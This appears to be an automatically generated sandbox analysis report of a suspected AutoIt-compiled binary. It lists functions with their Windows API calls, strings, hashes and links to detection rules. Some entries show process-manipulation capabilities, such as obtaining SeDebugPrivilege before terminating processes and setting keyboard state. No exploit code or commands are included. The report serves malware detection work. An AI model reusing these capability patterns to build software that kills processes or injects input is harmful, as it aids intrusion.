API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: dae749dae13d4d21b811556646418b3d0438e7460a395baf6700b13233727cdb
Instruction ID: 96539d7dd56494c6bb9aa2db72e2c6b7ac8f50763d1c9d21b4d8446f75b93f1b
Opcode Fuzzy Hash: dae749dae13d4d21b811556646418b3d0438e7460a395baf6700b13233727cdb
Instruction Fuzzy Hash: F861B2342142419FD710DF19C494F6ABBE1AF45318F18849CF4AA8B7A3C776ED49CB92

Function 00C43886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C43925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C4393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C43954
_wcslen.LIBCMT ref: 00C43999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C439C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C439F4

Strings

SysListView32, xrefs: 00C438F7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: acc47aaf3281e66b8b9341736f711f54c7e10ae41b821e0301b0e0f1c09c8cb0
Instruction ID: d034c33f6e17f346f4ca69ac7589583987e7682d6718b3006153ef17f1f21af9
Opcode Fuzzy Hash: acc47aaf3281e66b8b9341736f711f54c7e10ae41b821e0301b0e0f1c09c8cb0
Instruction Fuzzy Hash: 8541B371A00218ABEF219FA4CC49BEE7BA9FF58350F110526F958E7291D7719E84CB90

Function 00C1BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C1BCFD
IsMenu.USER32(00000000), ref: 00C1BD1D
CreatePopupMenu.USER32 ref: 00C1BD53
GetMenuItemCount.USER32(00E35290), ref: 00C1BDA4
InsertMenuItemW.USER32(00E35290,?,00000001,00000030), ref: 00C1BDCC

Strings

0, xrefs: 00C1BCA8
2, xrefs: 00C1BD37

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 6be1ed370342ebc5cf137a1f00082f34c98b4bf67f8a5f0d8645de308b1140fd
Instruction ID: b7da2c08110ac3bbed348fbfdd7b1b2eef7aff500795eba2133d55b82ddd35bc
Opcode Fuzzy Hash: 6be1ed370342ebc5cf137a1f00082f34c98b4bf67f8a5f0d8645de308b1140fd
Instruction Fuzzy Hash: 80518C70A002059BDB18EFA9E8C4BEEBBF4BF5A314F144159F42197298D770AE81EF51

Function 00C1C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C1C913

Strings

stop, xrefs: 00C1C8E4
blank, xrefs: 00C1C895
warning, xrefs: 00C1C8FC
info, xrefs: 00C1C8B4
question, xrefs: 00C1C8CC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: b1efc7c0a58651d431da627ca1df9f48f4bd9fddef19ab2b1e4e61d02f12f711
Instruction ID: 7c273e90510e8c804b14a67dcde2dfefc66a3e763a785ee3426de0b29ea68960
Opcode Fuzzy Hash: b1efc7c0a58651d431da627ca1df9f48f4bd9fddef19ab2b1e4e61d02f12f711
Instruction Fuzzy Hash: 8E1127326C9706BBA7049B559CC3DEE67DCDF17364F20407BF504AA2C2E7B05E806268

Function 00C1ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C1ED2A
_wcslen.LIBCMT ref: 00C1ED3B
_wcslen.LIBCMT ref: 00C1ED79
_wcslen.LIBCMT ref: 00C1EDAF
_wcslen.LIBCMT ref: 00C1EDDF
_wcslen.LIBCMT ref: 00C1EDEF
_wcslen.LIBCMT ref: 00C1EE2B
_wcslen.LIBCMT ref: 00C1EE5A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: ad327767fc94c9fc46ab0115570b42132214c0df043cdca52109c3a834195a39
Instruction ID: 1276285495151e985199b5b9c2f51834600915ef5f13e358d4aace88e64ae435
Opcode Fuzzy Hash: ad327767fc94c9fc46ab0115570b42132214c0df043cdca52109c3a834195a39
Instruction Fuzzy Hash: 60416065C1021866CB11EBB4CC8A9CFB7E8AF46710F5085A7E918E3221FB34E695C7E5

Function 00BCF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C0682C,00000004,00000000,00000000), ref: 00BCF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C0682C,00000004,00000000,00000000), ref: 00C0F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C0682C,00000004,00000000,00000000), ref: 00C0F454

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6f087975c4abe8413a8a169a3c320568b2981c828f60b15f806654c11813d7a2
Instruction ID: 1fccb46d16567e4cf58fa1d74b68f6d91d6ad1b527eb16e74f134f6dc3253059
Opcode Fuzzy Hash: 6f087975c4abe8413a8a169a3c320568b2981c828f60b15f806654c11813d7a2
Instruction Fuzzy Hash: 21411630608681BACF788B6988C8F7E7BD3BB46320F1444FCE487569B0C6B1E981CB11

Function 00C42D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C42D1B
GetDC.USER32(00000000), ref: 00C42D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C42D2E
ReleaseDC.USER32(00000000,00000000), ref: 00C42D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C42D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C42D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C45A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C42DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C42DE1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: c348c9f0fe10307c574ad634a300b470756704eff09b23b1483f5b2beba25b4e
Instruction ID: c729d4cc67ccd5bb628aa431b7f4490e390e324c854db61f43190b03a13cf193
Opcode Fuzzy Hash: c348c9f0fe10307c574ad634a300b470756704eff09b23b1483f5b2beba25b4e
Instruction Fuzzy Hash: 6C317A76202614BFEB218F50CC8AFEB3FA9FF0A715F044055FE089A2A1C6759C50CBA4

Function 00C15622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C15637
_memcmp.LIBVCRUNTIME ref: 00C15659
_memcmp.LIBVCRUNTIME ref: 00C15671
_memcmp.LIBVCRUNTIME ref: 00C15684
_memcmp.LIBVCRUNTIME ref: 00C1569E
_memcmp.LIBVCRUNTIME ref: 00C156B1
_memcmp.LIBVCRUNTIME ref: 00C156C9
_memcmp.LIBVCRUNTIME ref: 00C156E4

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 64d5607eaf01e16cc3c5ec1c2555d437c1c8acc016867a3ad69ce4c9b5180efa
Instruction ID: 7ec880cce08dba1748ee74a75b8774a7e3a0d14ea1c9ba7411678af6261ae6d0
Opcode Fuzzy Hash: 64d5607eaf01e16cc3c5ec1c2555d437c1c8acc016867a3ad69ce4c9b5180efa
Instruction Fuzzy Hash: B921F661B40A09FBD2145A258E82FFA739CFFA3394F440035FD049A782F760EE51A1E9

Function 00C34FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C35007
NULL Pointer assignment, xrefs: 00C3502E, 00C35383

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 06c8cfa0c90ddfe5be7ce6aefe5822f874897207593fd792e8f3d32425cdbf26
Instruction ID: 1acaac62a93dda31597fa79565b742668eb3ba576f0fe965423f261881805a46
Opcode Fuzzy Hash: 06c8cfa0c90ddfe5be7ce6aefe5822f874897207593fd792e8f3d32425cdbf26
Instruction Fuzzy Hash: C6D1E375A1060A9FDF14CFA8C880FAEB7B5FF48344F148069E925AB291E771DE41CB90

Function 00BF1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BF17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BF15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BF17FB,?,00BF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF16FB

Part of subcall function 00BE3820: RtlAllocateHeap.NTDLL(00000000,?,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6,?,00BB1129), ref: 00BE3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF1777
__freea.LIBCMT ref: 00BF17A2
__freea.LIBCMT ref: 00BF17AE

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: aec4bf137ecbb50699bf0e196628c22bc714bb06998873947beb04fc7125c72f
Instruction ID: 3d4bd42a5b8511c6b82e6c67976d1b1a64111241d60b5d075b2e2d1451842bd5
Opcode Fuzzy Hash: aec4bf137ecbb50699bf0e196628c22bc714bb06998873947beb04fc7125c72f
Instruction Fuzzy Hash: 1091B271E0021ADADB209E78C881AFEBBF5EF59310F184E99EA05E7151D735DC48CB60

Function 00C34523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C34648
VariantInit.OLEAUT32(?), ref: 00C34749
VariantClear.OLEAUT32(?), ref: 00C34753
VariantClear.OLEAUT32(?), ref: 00C347B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C345D8, 00C34706, 00C347BE
Incorrect Object type in FOR..IN loop, xrefs: 00C3472C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 20068e07e8f904e51c2d2116e8dc5d8d605daa489c965fdaf9475699b29954d0
Instruction ID: 88c44d1c96ccfca649eb3b03b9aa646129af0f10800e139bcd571cf38689e36b
Opcode Fuzzy Hash: 20068e07e8f904e51c2d2116e8dc5d8d605daa489c965fdaf9475699b29954d0
Instruction Fuzzy Hash: 4991A171E10219AFDF28CFA5C885FAEBBB8EF46710F108559F515AB290D770A941CFA0

Function 00C21187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C2125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C212A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C212D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C2135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C213C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C21430

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 9763bed5fb501c0389d8b25e8532ac035250e37fb21bc3e0dcf007c74144e2a1
Instruction ID: 9b968fdd06d29f27c15fe53de03658187fe99d425e12d92821fd00c02d254b03
Opcode Fuzzy Hash: 9763bed5fb501c0389d8b25e8532ac035250e37fb21bc3e0dcf007c74144e2a1
Instruction Fuzzy Hash: CD911475A002289FDB00DFA8E884BBEB7F5FF55320F294069E910E76A1D774E941CB90

Function 00BC948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 3a37cb0d2371aadced3aa97b9130f81d01a59a6aaaf9991b00221775c415287b
Instruction ID: 0c8ed45b7a97bdbc7ce678e7dd742161774d79ce4e658c9058f5d18b79444315
Opcode Fuzzy Hash: 3a37cb0d2371aadced3aa97b9130f81d01a59a6aaaf9991b00221775c415287b
Instruction Fuzzy Hash: F9910671D00219EFDB14CFA9CC88AEEBBB8FF49320F148599E515B7291D774AA41CB60

Function 00C33947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C3396B
CharUpperBuffW.USER32(?,?), ref: 00C33A7A
_wcslen.LIBCMT ref: 00C33A8A
VariantClear.OLEAUT32(?), ref: 00C33C1F

Part of subcall function 00C20CDF: VariantInit.OLEAUT32(00000000), ref: 00C20D1F
Part of subcall function 00C20CDF: VariantCopy.OLEAUT32(?,?), ref: 00C20D28
Part of subcall function 00C20CDF: VariantClear.OLEAUT32(?), ref: 00C20D34

Strings

AUTOIT.ERROR, xrefs: 00C33A80, 00C33A85
Incorrect Parameter format, xrefs: 00C339A6, 00C33BA1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 9cded7a764edffbeb4b84774fbad798a1dc90f3e4c648160142055d397341501
Instruction ID: 452b91e32236bcef43abd403413ee7f7b28dbc2f11796472f1a95f9c9d02e08f
Opcode Fuzzy Hash: 9cded7a764edffbeb4b84774fbad798a1dc90f3e4c648160142055d397341501
Instruction Fuzzy Hash: E4919974A183459FC700EF68C48096ABBE4FF89314F14896DF89A9B351DB30EE45CB92

Function 00C34BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00C1000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?,?,00C1035E), ref: 00C1002B
Part of subcall function 00C1000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?), ref: 00C10046
Part of subcall function 00C1000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?), ref: 00C10054
Part of subcall function 00C1000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?), ref: 00C10064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C34C51
_wcslen.LIBCMT ref: 00C34D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C34DCF
CoTaskMemFree.OLE32(?), ref: 00C34DDA

Strings

NULL Pointer assignment, xrefs: 00C34E23, 00C34E52

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 3d8896cb72b5da17f68744675aa6e20467954a8955f372bb12c0675880c8f8e4
Instruction ID: 8edff46aea1f493944c9abfca74bc071ea240d3fa230712aa5fd1b6ab10e46a5
Opcode Fuzzy Hash: 3d8896cb72b5da17f68744675aa6e20467954a8955f372bb12c0675880c8f8e4
Instruction Fuzzy Hash: A7910771D0021DAFDF14DFA4D891AEEB7B9FF08310F10416AE915A7291EB74AA45CF60

Function 00C420FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C42183
GetMenuItemCount.USER32(00000000), ref: 00C421B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C421DD
_wcslen.LIBCMT ref: 00C42213
GetMenuItemID.USER32(?,?), ref: 00C4224D
GetSubMenu.USER32(?,?), ref: 00C4225B

Part of subcall function 00C13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C13A57
Part of subcall function 00C13A3D: GetCurrentThreadId.KERNEL32 ref: 00C13A5E
Part of subcall function 00C13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C125B3), ref: 00C13A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C422E3

Part of subcall function 00C1E97B: Sleep.KERNEL32 ref: 00C1E9F3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c2e2d573f31a49447b3b3803f32781b2066a49a2b5a1511d4ee0cb367023248c
Instruction ID: 2172d19f042bc5a8af64bba9afdae7117ecbd5d405e88a18f814b114c88d7572
Opcode Fuzzy Hash: c2e2d573f31a49447b3b3803f32781b2066a49a2b5a1511d4ee0cb367023248c
Instruction Fuzzy Hash: BE718075A00205AFCB10DF65C886AAEBBF5FF49320F508499F816EB351DB74AE41DB90

Function 00C1AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C1AEF9
GetKeyboardState.USER32(?), ref: 00C1AF0E
SetKeyboardState.USER32(?), ref: 00C1AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C1AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C1AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C1AFFD
